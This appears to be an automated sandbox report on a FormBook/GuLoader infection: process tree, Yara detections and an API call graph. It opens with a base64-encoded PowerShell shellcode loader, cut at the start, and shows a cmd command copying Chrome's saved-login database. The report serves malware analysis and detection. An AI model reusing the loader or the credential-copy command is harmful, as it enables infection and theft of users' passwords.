QALABpAG4AdAAgAFUAbgBmAGwAYQBnAGYAbwA0ADAALABpAG4AdAAgAEQAZQBjAGEAcABpAHQAYQB0ADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBEADIAcwB0AGEAbQBwACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABQAG8AbwBsAFMAdABhAGMAawAoACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIARQBuAHUAbQBXAGkAbgBkAG8AdwBzACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATQBvAHIAcQBxACgAdQBpAG4AdAAgAFMAcAByAG8AZwA1ACwAaQBuAHQAIABTAHAAcgBvAGcANgApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB2AG8AaQBkACAAUgB0AGwATQBvAHYAZQBNAGUAbQBvAHIAeQAoAEkAbgB0AFAAdAByACAAUwBwAHIAbwBnADEALAByAGUAZgAgAEkAbgB0ADMAMgAgAFMAcAByAG8AZwAyACwAaQBuAHQAIABTAHAAcgBvAGcAMwApADsADQAKAA0ACgB9AA0ACgAiAEAADQAKACMAUwB0AGUAbABsAGEAcgAgAFMAdgBhAGwAZQBnAGEAbgBnACAATgBhAHQAaQBvAG4AYQAgAFMAawByAGEAYgBuAHMAZQAgAEYAdQBuAGMAdABpAG8AbgBpACAAQQBjAGgAYQBlACAAQgByAGUAZABkAGUAIABlAHAAbwBjAGgAbwB2AGUAcgB0ACAATwB1AHQAeQBlACAARwByAG8AdQAgAFMAbgByAGUAbgByAGUAYwBvAG4AIABIAHUAcwBwAGwAYQAgAFMAdABhAHYAZQBrAG8AbgB0AHIAIABQAHUAbABsACAAVQBuAHIAZQBjAG8AZwBuACAARAByAGkAawBrAGUAbgBkAGUAdAAgAEUAbgBnAGkAbgBlAGUAcgBlAHMAIAAgAA0ACgAkAEQAZQBjAGEAcABpAHQAYQB0ADMAPQAwADsADQAKACMAQgBhAGwAZAB1AGMAdAAgAEQAaQBhAGMAbwBuAGEAIABTAGMAbABlAHIAZQBjAHQAIABEAGEAdABhACAAUgBhAGEAYgAgAEgAZQBnAG4AcwB0AHIAYQAgAFUAdABpAGwAIABLAG8AbgBkAG8AbABlAG4AIABPAHYAZQByAGkAZAAgAHYAaQBsAGsAYQBhAHIAbABpACAATwB2AGUAcgBzACAAYwBvAG4AZgBpACAAVABhAGcAZQB0AGUAcwBlAG4AZQAgAEIAbwB0AHQAbABlACAAUwBhAG4AZwBmAHUAZwBsAGUAbgAgAEcAdQBkAGQAbwBtAG0AZwAgAG0AdQBuAGsAZQBvAHIAZAAgAEEAbQB5AGcAZABhAGwAaQBjAGsAIABTAGUAYQBsAGUAdAB0ACAARgByAHMAdABlAGcAYQBuAGcAcwAgAFIAZQBtAG8AcgBkACAAVQBuAGcAbwB2AGUAcgAgAEEAcABwAGUAdAAgAFMAdQByAG0AdQBsAGUAcgAgAEsAdgBhAG4AdAB1AG0AbQBlACAADQAKACQARABlAGMAYQBwAGkAdABhAHQAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAIwBMAGEAbgBpAHMAdABhAGMAYQAgAGgAdQBuAGQAIABJAG4AdgBvAGMAYQAgAEcAbwBzAHAAZQBsAGUAIABDAG8AdQBuAHQAIABkAGUAbABvAGMAYQAgAEEAcgBhAGsAIABNAG8AZABlAG0AcAByAG8AZwAgAFYAYQBuAGQAbABlACAASQBzAG8AcABsACAAQgBhAG4AZABhAG4AaQBzACAARgBqAG8AcgB0ACAATAB5AHMAcwBlAGUAIABmAGwAdQBvAHIAZQBzAGMAZQAgAFUAbgBrAG4AIABCAG8AdwBrAHQAcgAgAFMAdAB1AGIAaABhAHIAdgAgAE4AbwBuAHMAcABpAHIAIABFAHIAcABlAHQAbwBsAG8AIABQAGwAZQB1AHIAbwBjAGEAcABzACAAUwB0AGUAbgBpAG4AZwBlAHIAcwAgAFIAZQBuAHIAaQBuACAADQAKACQARABlAGMAYQBwAGkAdABhAHQAOAA9AFsARABlAGMAYQBwAGkAdABhAHQAMQBdADoAOgBWAGkAdAByAG8AUwBvAGwAaQBkACgALQAxACwAWwByAGUAZgBdACQARABlAGMAYQBwAGkAdABhAHQAMwAsADAALABbAHIAZQBmAF0AJABEAGUAYwBhAHAAaQB0AGEAdAA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMATgBvAGMAdABhAG0AYgB1AGwAYQAgAFMAdABpAG4AawBlAHIAdgByAGEAIABQAGEAcgB0AG4AZQByAHMAawBlACAAVABoAGUAcgBtAG8AIABTAGUAcgB2AGUAcgBpAG4AZwAgAEUAZgB0AGUAIABtAHUAcwBrAHUAbAAgAFIAZQBpAG4AdgBpAHQAIABCAG8AbABzAHQAZQByACAAQgBhAHIAawBrACAATABlAHQAaABhAHIAZwBpAGMAYQAgAE0AYQBsAGEAbgBnAGEAcwB0AGEAIABQAG8AbAB5AHAAbwBpAGQAYQAgAEIAbwB0AHQAbwAgAFgAZQBuAG8AZwBlAG4AIABTAGwAaQBwAHAAZQAgAFAAbwBzAHQAYwBsAGEAdgAgAFUAbgB0AGUAbQBwAGUAIABBAHIAZQB0AHUAYgBlACAAQQBjAHEAdQBpAHMAaQAgAHQAYQBiAG8AdQByACAAQQB0AHQAYQBpAG4AIABMAGkAZwBlAGYAcgAgAFAAbABhAGQAcwBwACAARgBvAHMAdABlAHIAZgAgAEEAbgB2AGUAbgBkAGUAbABzAGUAIABGAGEAcwB0AGwAZwBuAGkAIABQAHIAbwBwAHkAIABGAG8AcgB0AGoAZQBuAGUAIAANAAoAJABDAG8AYwB1AGkAcwBhAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEoAdQBuAGcAbQBuAGQAYQBmADEAMQAiACkALgBSAGUAcwBwAHIAYQB5AA0ACgAjAE0AaQBjAHIAbwBiAHUAcwAgAEQAbwB0AGEAdABpACAAUwB0AHIAYQBuAGQAdgBhAHMAawAgAFAAcwBhAGwAdABlAHIAaQBhAGIAIABGAGEAcgB2AGUAaABhAG4AZAAgAFMAawB1AG0AbABlAHIAIABNAGEAawByAGUAbABsACAAQwBvAHIAcwBhACAAdQBuAGkAbwBuAHMAdABpACAASABlAGEAZABiACAARAB5AHIAZQB0AG0AbQBlAHIAZQAgAFUAbgBzAG8AbgBiAG8AdQBsACAATAByAGUAbQBlAHMAdAByAGUAcwAgAEYAZgBlAG4AIABCAGEAZwBzAGwAYQBnACAARwB5AGwAcABlAG4AZQBsAGUAIAB1AHAAdwBhACAADQAKACQASwBvAHAAdQBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAFsAXQBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBdACwAJABDAG8AYwB1AGkAcwBhAGYALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkADQAKACMAVgBhAHMAbwBjAG8AbgBzAHQAcgAgAEYAcgBlAGQAYQBnACAATgBhAGQAYQB0ACAAVQByAG8AdABvAHgAIABDAG8AbABsAG8AaQBkAGEAIABCAGUAawBlAG4AZAB0ACAASABlAGwAaQBvAG0AZQB0AGUAIABTAHQAcgBpACAAQQBkAGEAbABhAHQAZgByAGUAcwAgAFMAbwBsAGIAIABHAGUAbgBpAG4AcwB0AHYAIABPAGYAZgBlAG4AZABhAGIAIAB1AG0AeQBuAGQAaQBnAGcAcgAgAFMAcABhAHMAIABiAHIAdABzAHAAaQBsAGwAZQB0ACAAZgBvAHIAZwB5AGwAZAB0ACAAdgBhAGMAYQB0AGkAbwBuAGUAIABCAGUAbgBnAGEAIABBAG4AdABlAHAAIAANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAQwBvAGMAdQBpAHMAYQBmAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAA0ACgAJAHsADQAKACAAIAAgACAAIAAgACAAIAAkAEsAbwBwAHUAbABbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAEMAbwBjAHUAaQBzAGEAZgAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAA0ACgAgACAAIAAgAH0ADQAKAA0ACgANAAoAZgBvAHIAKAAkAEMAaABlAGMAawBiAGwAPQAwADsAIAAkAEMAaABlAGMAawBiAGwAIAAtAGwAdAAgACQASwBvAHAAdQBsAC4AYwBvAHUAbgB0ACAAOwAgACQAQwBoAGUAYwBrAGIAbAArACsAKQANAAoAewANAAoACQANAAoAWwBEAGUAYwBhAHAAaQB0AGEAdAAxAF0AOgA6AFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKAAkAEQAZQBjAGEAcABpAHQAYQB0ADMAKwAkAEMAaABlAGMAawBiAGwALABbAHIAZQBmAF0AJABLAG8AcAB1AGwAWwAkAEMAaABlAGMAawBiAGwAXQAsADEAKQANAAoADQAKAH0ADQAKAFsARABlAGMAYQBwAGkAdABhAHQAMQBdADoAOgBNAG8AcgBxAHEAKAAkAEQAZQBjAGEAcABpAHQAYQB0ADMALAAgADAAKQANAAoADQAKAA0ACgA=
                                                                                                              Imagebase:0x7f0000
                                                                                                              File size:433152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:20:00:50
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7097e0000
                                                                                                              File size:875008 bytes
                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:5
                                                                                                              Start time:20:01:20
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.cmdline
                                                                                                              Imagebase:0xc30000
                                                                                                              File size:2141552 bytes
                                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Target ID:6
                                                                                                              Start time:20:01:20
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC6A9.tmp" "c:\Users\user\AppData\Local\Temp\r0st5wfi\CSC6C14E777B6F1436A823D509EAA82CA50.TMP"
                                                                                                              Imagebase:0xb90000
                                                                                                              File size:46832 bytes
                                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:20:01:52
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                              Imagebase:0x840000
                                                                                                              File size:480256 bytes
                                                                                                              MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.24736277326.0000000000630000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:20:02:08
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                              Imagebase:0x7ff697d80000
                                                                                                              File size:4849904 bytes
                                                                                                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Target ID:9
                                                                                                              Start time:20:02:49
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                                                              Imagebase:0x350000
                                                                                                              File size:851968 bytes
                                                                                                              MD5 hash:469594005E3B94C5945BCCE7FC521C05
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Target ID:10
                                                                                                              Start time:20:02:49
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                                                              Imagebase:0x9f0000
                                                                                                              File size:147456 bytes
                                                                                                              MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: unknown

                                                                                                              General

                                                                                                              Target ID:11
                                                                                                              Start time:20:03:12
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                              Imagebase:0x2d0000
                                                                                                              File size:236544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              General

                                                                                                              Target ID:12
                                                                                                              Start time:20:03:13
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7097e0000
                                                                                                              File size:875008 bytes
                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              General

                                                                                                              Target ID:13
                                                                                                              Start time:20:03:16
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                              Imagebase:0x840000
                                                                                                              File size:480256 bytes
                                                                                                              MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              General

                                                                                                              Target ID:14
                                                                                                              Start time:20:03:25
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                              Imagebase:0x840000
                                                                                                              File size:480256 bytes
                                                                                                              MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              General

                                                                                                              Target ID:15
                                                                                                              Start time:20:03:43
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                              Imagebase:0x7ff776a50000
                                                                                                              File size:597432 bytes
                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:9.8%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:5.3%
                                                                                                                Total number of Nodes:150
                                                                                                                Total number of Limit Nodes:8
                                                                                                                execution_graph 67852 871cee0 67853 871cf21 SetThreadUILanguage 67852->67853 67854 871cf51 67853->67854 67910 819ecb0 67911 819ed0e CreateNamedPipeW 67910->67911 67913 819ede2 67911->67913 67914 8196e20 67920 8196844 67914->67920 67917 8196e55 67918 8196f1c CreateFileW 67919 8196f59 67918->67919 67921 8196ec8 CreateFileW 67920->67921 67923 8196e3f 67921->67923 67923->67917 67923->67918 67735 4b20c78 67736 4b20c99 67735->67736 67740 8196508 67736->67740 67747 81964f8 67736->67747 67737 4b20e78 67741 8196537 67740->67741 67746 8196519 67740->67746 67745 8196530 67745->67737 67746->67745 67753 819785f 67746->67753 67758 81977f9 67746->67758 67763 8197808 67746->67763 67748 8196508 67747->67748 67749 81977f9 GetFileAttributesW 67748->67749 67750 8197808 GetFileAttributesW 67748->67750 67751 819785f GetFileAttributesW 67748->67751 67752 8196530 67748->67752 67749->67752 67750->67752 67751->67752 67752->67737 67754 8197864 67753->67754 67755 8197999 67754->67755 67768 819b480 67754->67768 67773 819b470 67754->67773 67755->67755 67760 8197830 67758->67760 67759 8197999 67760->67759 67761 819b470 GetFileAttributesW 67760->67761 67762 819b480 GetFileAttributesW 67760->67762 67761->67759 67762->67759 67764 8197830 67763->67764 67765 8197999 67764->67765 67766 819b470 GetFileAttributesW 67764->67766 67767 819b480 GetFileAttributesW 67764->67767 67765->67765 67766->67765 67767->67765 67770 819b495 67768->67770 67769 819b4d8 67769->67755 67770->67769 67778 819bab0 67770->67778 67783 819baa0 67770->67783 67775 819b45a 67773->67775 67774 819b4d8 67774->67755 67775->67773 67775->67774 67776 819bab0 GetFileAttributesW 67775->67776 67777 819baa0 GetFileAttributesW 67775->67777 67776->67774 67777->67774 67780 819bad6 67778->67780 67779 819bc1b 67779->67769 67780->67779 67788 819bcc8 67780->67788 67794 819bcb7 67780->67794 67785 819baa5 67783->67785 67784 819bc1b 67784->67769 67785->67784 67786 819bcc8 GetFileAttributesW 67785->67786 67787 819bcb7 GetFileAttributesW 67785->67787 67786->67785 67787->67785 67789 819bce6 67788->67789 67790 819bd19 67789->67790 67800 819be82 67789->67800 67804 819bd5f 67789->67804 67808 819bd60 67789->67808 67790->67780 67795 819bcc2 67794->67795 67796 819bd19 67795->67796 67797 819bd5f GetFileAttributesW 67795->67797 67798 819bd60 GetFileAttributesW 67795->67798 67799 819be82 GetFileAttributesW 67795->67799 67796->67780 67797->67796 67798->67796 67799->67796 67801 819be8a 67800->67801 67802 819bf06 67801->67802 67812 819cc50 67801->67812 67805 819bd60 67804->67805 67806 819bf06 67805->67806 67807 819cc50 GetFileAttributesW 67805->67807 67807->67806 67810 819bd8c 67808->67810 67809 819bf06 67810->67809 67811 819cc50 GetFileAttributesW 67810->67811 67811->67809 67815 819cdd6 67812->67815 67816 819cddf 67815->67816 67820 819d6f0 67816->67820 67827 819d6ef 67816->67827 67817 819cc6b 67817->67802 67821 819d6ff 67820->67821 67823 819d70b 67820->67823 67834 819dd00 67821->67834 67841 819dcd5 67821->67841 67848 819df0a 67821->67848 67822 819d707 67822->67817 67823->67817 67828 819d6f0 67827->67828 67830 819d70b 67828->67830 67831 819df0a GetFileAttributesW 67828->67831 67832 819dd00 GetFileAttributesW 67828->67832 67833 819dcd5 GetFileAttributesW 67828->67833 67829 819d707 67829->67817 67830->67817 67831->67829 67832->67829 67833->67829 67835 819dd2a 67834->67835 67836 819dff5 67834->67836 67837 819dda7 67835->67837 67839 8300f17 GetFileAttributesW 67835->67839 67840 8300f18 GetFileAttributesW 67835->67840 67836->67822 67837->67836 67838 87109b1 GetFileAttributesW 67837->67838 67838->67836 67839->67837 67840->67837 67842 819dcee 67841->67842 67843 819dff5 67842->67843 67844 819dda7 67842->67844 67846 8300f17 GetFileAttributesW 67842->67846 67847 8300f18 GetFileAttributesW 67842->67847 67843->67822 67844->67843 67845 87109b1 GetFileAttributesW 67844->67845 67845->67843 67846->67844 67847->67844 67849 819df14 67848->67849 67850 819dff5 67849->67850 67851 87109b1 GetFileAttributesW 67849->67851 67850->67822 67851->67850 67855 4b21a28 67856 4b21a3a 67855->67856 67860 4b24d79 67856->67860 67865 4b24d88 67856->67865 67857 4b21a6a 67861 4b24d92 67860->67861 67862 4b24db7 67861->67862 67870 4b24e40 67861->67870 67875 4b24e3f 67861->67875 67862->67857 67867 4b24d92 67865->67867 67866 4b24db7 67866->67857 67867->67866 67868 4b24e40 GetFileAttributesW 67867->67868 67869 4b24e3f GetFileAttributesW 67867->67869 67868->67866 67869->67866 67871 4b24e53 67870->67871 67880 4b24eb8 67871->67880 67886 4b24ea8 67871->67886 67872 4b24e71 67872->67862 67876 4b24e40 67875->67876 67878 4b24eb8 GetFileAttributesW 67876->67878 67879 4b24ea8 GetFileAttributesW 67876->67879 67877 4b24e71 67877->67862 67878->67877 67879->67877 67882 4b24ecd 67880->67882 67881 4b24fd5 67881->67872 67882->67881 67892 4b26359 67882->67892 67884 4b26359 GetFileAttributesW 67884->67881 67888 4b24ecd 67886->67888 67887 4b24fd5 67887->67872 67888->67887 67891 4b26359 GetFileAttributesW 67888->67891 67889 4b24f93 67889->67887 67890 4b26359 GetFileAttributesW 67889->67890 67890->67887 67891->67889 67896 4b2669f 67892->67896 67901 4b266a0 67892->67901 67893 4b24f93 67893->67881 67893->67884 67897 4b266a0 67896->67897 67898 4b266cd 67897->67898 67906 4b25d0c 67897->67906 67898->67893 67902 4b266b8 67901->67902 67903 4b266cd 67902->67903 67904 4b25d0c GetFileAttributesW 67902->67904 67903->67893 67905 4b266fe 67904->67905 67905->67893 67907 4b26cd0 GetFileAttributesW 67906->67907 67909 4b266fe 67907->67909 67909->67893

                                                                                                                Executed Functions

                                                                                                                Function 0819ECB0 Relevance: 1.6, APIs: 1, Instructions: 125pipeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
